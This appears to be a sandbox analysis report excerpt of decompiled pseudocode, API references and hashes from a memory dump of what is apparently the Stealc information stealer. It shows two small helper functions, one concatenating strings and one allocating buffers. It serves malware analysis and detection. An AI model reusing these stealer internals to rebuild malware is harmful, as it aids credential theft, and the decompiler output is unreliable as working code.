              Uniqueness Score: -1.00%

              C-Code - Quality: 61%
              			E0017B7CA(void* __eflags, char _a4) {
              				void* _v8;
              				char _v20;
              				char _v284;
              				void* __ebx;
              				void* __edi;
              				void* __esi;
              				void* _t58;
              
              				_v8 =  &_v284;
              				memset(_v8, 0, 0x104 << 0);
              				 *0x383730( &_v284,  *((intOrPtr*)(E0017D8C9( &_v20, 0x1a))));
              				E00171839(_v20);
              				 *0x383730( &_v284, 0x17fbdc);
              				 *0x383730( &_v284,  *0x3834ec);
              				 *0x383730();
              				_t60 = _t58 + 0xc - 0x50;
              				_t43 =  &_a4;
              				E001716CB( &_a4, _t58 + 0xc - 0x50);
              				E0017B446(0x17fbd9,  &_v284,  *0x3832e4,  *0x3834ec,  &_v284);
              				E001716CB( &_a4, _t60 + 0x10);
              				E0017B446(0x17fbd9,  &_v284,  *0x3833dc,  *0x3834ec, 0x17fbdc);
              				_v8 =  &_v284;
              				memset(_v8, 0, 0x104 << 0);
              				return E001716AC(_t43);
              			}










              0x0017b7dc
              0x0017b7e9
              0x0017b7ff
              0x0017b808
              0x0017b81a
              0x0017b82d
              0x0017b83b
              0x0017b841
              0x0017b844
              0x0017b849
              0x0017b867
              0x0017b871
              0x0017b88a
              0x0017b898
              0x0017b8a5
              0x0017b8b2

              APIs
              • lstrcat.KERNEL32(?,00000000), ref: 0017B7FF
              • lstrcat.KERNEL32(?,0017FBDC), ref: 0017B81A
              • lstrcat.KERNEL32(?), ref: 0017B82D
              • lstrcat.KERNEL32(?,0017FBDC), ref: 0017B83B
                • Part of subcall function 0017B446: lstrcat.KERNEL32(?), ref: 0017B556
                • Part of subcall function 0017B446: lstrcat.KERNEL32(?,0017FBDC), ref: 0017B569
                • Part of subcall function 0017B446: lstrcat.KERNEL32(?,?), ref: 0017B579
                • Part of subcall function 0017B446: lstrcat.KERNEL32(?,0017FBDC), ref: 0017B587
                • Part of subcall function 0017B446: lstrcat.KERNEL32(?,?), ref: 0017B59B
              Memory Dump Source
              • Source File: 00000002.00000002.284082121.0000000000171000.00000080.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
              • Associated: 00000002.00000002.284077198.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000002.00000002.284101447.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000002.00000002.284113807.0000000000383000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000002.00000002.284132410.0000000000395000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_170000_stealc.jbxd
              Yara matches
              Similarity
              • API ID: lstrcat
              • String ID:
              • API String ID: 4038537762-0
              • Opcode ID: 28c159c56f5af49d7b52f55f2b19f781ed45edcfa0e1d2d94f64c5ea8e669283
              • Instruction ID: 588e2c49a2e0df40e987ba9bb5262158766abea4933c901882fe6394cd9e4f86
              • Opcode Fuzzy Hash: 28c159c56f5af49d7b52f55f2b19f781ed45edcfa0e1d2d94f64c5ea8e669283
              • Instruction Fuzzy Hash: C5215EB280011CAFCB41EBA4DD469DA77BDEF44310F0484E1F60AE3221DB359F958B92
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 64%
              			E001730F8(void* _a4, intOrPtr _a8) {
              				signed int _v16;
              				void* _v20;
              				signed int _v44;
              				void* _v48;
              				signed int _v56;
              				void* _v60;
              				void _v64;
              				void _t19;
              				void* _t22;
              				char* _t30;
              				signed int _t31;
              				void _t33;
              				void* _t34;
              				void* _t40;
              				intOrPtr _t42;
              
              				_t19 = 0x3c;
              				_t33 = _t19;
              				_t30 =  &_v64;
              				do {
              					 *_t30 = 0;
              					_t30 = _t30 + 1;
              					_t33 = _t33 - 1;
              				} while (_t33 != 0);
              				_v56 = _v56 | 0xffffffff;
              				_v44 = _v44 | 0xffffffff;
              				_v16 = _v16 | 0xffffffff;
              				_v64 = _t19;
              				_v48 = malloc(0x400);
              				_v60 = malloc(0x400);
              				_t22 = malloc(0x400);
              				_t42 = _a8;
              				_v20 = _t22;
              				 *0x383640(_t42,  *0x383658(_t42, 0,  &_v64, _t34, _t40));
              				_t31 = 0xf;
              				E00171839(memcpy(_a4,  &_v64, _t31 << 2));
              				return _a4;
              			}


















              0x00173100
              0x00173101
              0x00173103
              0x00173106
              0x00173106
              0x00173109
              0x0017310a
              0x0017310a
              0x0017310d
              0x00173111
              0x00173115
              0x00173127
              0x0017312d
              0x00173133
              0x00173136
              0x00173138
              0x0017313e
              0x00173150
              0x0017315e
              0x00173164
              0x0017316f

              APIs
              Memory Dump Source
              • Source File: 00000002.00000002.284082121.0000000000171000.00000080.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
              • Associated: 00000002.00000002.284077198.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000002.00000002.284101447.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000002.00000002.284113807.0000000000383000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000002.00000002.284132410.0000000000395000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_170000_stealc.jbxd
              Yara matches
              Similarity
              • API ID: malloc$lstrlen
              • String ID:
              • API String ID: 2312681527-0
              • Opcode ID: a498f4ada179b093812e12d32fab0058ce64337ea8a29dc3783b3c7beed74c94
              • Instruction ID: 8946a524c1375d2d8e814b9a7ac12e6295261ccbbe5b86c2ecb144a406c2f5ea
              • Opcode Fuzzy Hash: a498f4ada179b093812e12d32fab0058ce64337ea8a29dc3783b3c7beed74c94
              • Instruction Fuzzy Hash: 35011E31D00218BBCB159FA9DC45ADEBFB8EF55730F108216F925E72A0D77456018B94
              Uniqueness

              Uniqueness Score: -1.00%